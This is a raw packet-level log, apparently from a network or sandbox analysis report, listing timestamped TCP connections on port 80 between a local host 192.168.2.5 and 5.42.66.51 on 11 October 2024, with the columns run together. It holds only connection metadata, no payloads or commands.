                                                                                                Oct 11, 2024 20:38:54.018515110 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.020370960 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:54.020447016 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.020570993 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.025525093 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:54.417082071 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.422276974 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:54.422369003 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.621860981 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:56.626903057 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.627029896 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:56.627305031 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:56.632136106 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.663260937 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:56.708301067 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.990961075 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:56.996534109 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.996553898 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:56.996565104 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.343290091 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.435543060 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.471149921 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.519732952 CEST80500495.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.519836903 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.544918060 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.832123041 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.832475901 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.837608099 CEST80500505.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.837682009 CEST5005080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.837903023 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:57.837974072 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.838104010 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:57.843094110 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.185700893 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.190912008 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.191031933 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.541266918 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.591784954 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.672930956 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.794914961 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.910312891 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.910341024 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.915273905 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.915406942 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.917371035 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:58.922730923 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.942523956 CEST80500515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:58.942600012 CEST5005180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:59.263747931 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:59.268850088 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:59.268884897 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:59.268915892 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:59.620443106 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:59.747216940 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:59.747402906 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.004108906 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.010159969 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.010222912 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.012772083 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.017693043 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.096995115 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.101998091 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.102089882 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.102210045 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.107140064 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.357491970 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.362552881 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.362579107 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.451417923 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.456449986 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.456463099 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.456474066 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.694513083 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.748039961 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.779896021 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.823239088 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.888793945 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:00.907224894 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:00.935645103 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.029587030 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.029587030 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.029807091 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.029882908 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.035604000 CEST80500545.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.035769939 CEST5005480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.035773039 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.035846949 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.036029100 CEST80500535.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.036079884 CEST5005380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.036139965 CEST80500525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.036192894 CEST5005280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.036581993 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.043092012 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.388938904 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.394141912 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.394187927 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.394216061 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.730787039 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.795797110 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.800632000 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.800865889 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.800964117 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.801029921 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:01.805898905 CEST80500555.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.806202888 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:01.806256056 CEST5005580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:02.176610947 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:02.591818094 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:02.734816074 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.734844923 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.734901905 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:02.737653971 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.737710953 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:02.738279104 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.739085913 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.740214109 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:02.742790937 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:03.070744991 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:03.294991016 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.100404978 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.100697041 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.106125116 CEST80500565.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.106318951 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.106381893 CEST5005680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.106412888 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.106539011 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.111845016 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.451307058 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.456414938 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.456712008 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.702547073 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.707766056 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.709753036 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.709857941 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:04.714859962 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.780942917 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.914619923 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:04.914695024 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.060659885 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.065895081 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.066071987 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.066108942 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.586491108 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.586978912 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.587065935 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.587106943 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.587255955 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.826845884 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.826847076 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.827106953 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.832110882 CEST80500595.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.832207918 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.832288980 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.832437038 CEST80500585.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.832500935 CEST5005880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.833090067 CEST80500575.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:05.833147049 CEST5005780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:05.837316990 CEST80500595.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.185779095 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.477400064 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.490282059 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.519279003 CEST80500595.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.519809008 CEST80500595.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.520087957 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.520174026 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.520303965 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.520678997 CEST80500595.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.520754099 CEST5005980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.525460958 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.873120070 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:06.878492117 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.878532887 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:06.878561020 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.216325045 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.347053051 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.347239017 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.450434923 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.453500986 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.456007957 CEST80500605.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.456069946 CEST5006080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.458302975 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.458376884 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.458498955 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.463566065 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.810586929 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:07.815797091 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.815817118 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.149085045 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.283118010 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.283307076 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.297929049 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.303136110 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.303247929 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.303364038 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.308413982 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.654578924 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.659807920 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.659828901 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.659841061 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.986346006 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.044934988 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.115611076 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.139978886 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.143774986 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.143939018 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.145817041 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.145879984 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.148747921 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.148811102 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.149144888 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.149198055 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.151153088 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.155952930 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.498414040 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.503535986 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.503582001 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.841893911 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.888684988 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.977333069 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.091814041 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.127229929 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.127262115 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555563927 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.555653095 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.555732012 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555877924 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555881023 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.560964108 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.926929951 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.053735018 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.072520018 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.748049021 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.920528889 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.969885111 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970087051 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.970293045 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970350981 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.970398903 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970446110 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.973678112 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.973745108 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.975465059 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.975522041 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976500034 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976536036 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976548910 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976566076 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976596117 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976619959 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976633072 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976650953 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976736069 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976803064 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.981549025 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.981688976 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.334964991 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.335028887 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.340174913 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340291023 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340318918 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340373039 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340399981 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.739557981 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.739603043 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792818069 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792865038 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792891026 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.792936087 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.521945000 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.521994114 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.522226095 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527175903 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527245045 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527296066 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527311087 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527409077 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527762890 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527812958 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.532152891 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.592658043 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.597815037 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.597937107 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.598022938 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.602924109 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.873146057 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.878307104 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.878329992 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.878343105 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.953983068 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.959184885 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.959286928 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.214337111 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.273142099 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.279320955 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.343511105 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.388796091 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.388807058 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.404541016 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.591780901 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170686960 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170715094 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170952082 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.175991058 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176021099 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176057100 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176099062 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176261902 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176323891 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176419973 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.181154013 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.190095901 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.194953918 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.195041895 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.195111990 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.199954987 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.529434919 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.534416914 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.534569979 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.544970989 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.549988985 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.550003052 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.550014019 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.868525028 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.888916016 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.935862064 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.982428074 CEST5007080192.168.2.55.42.66.51
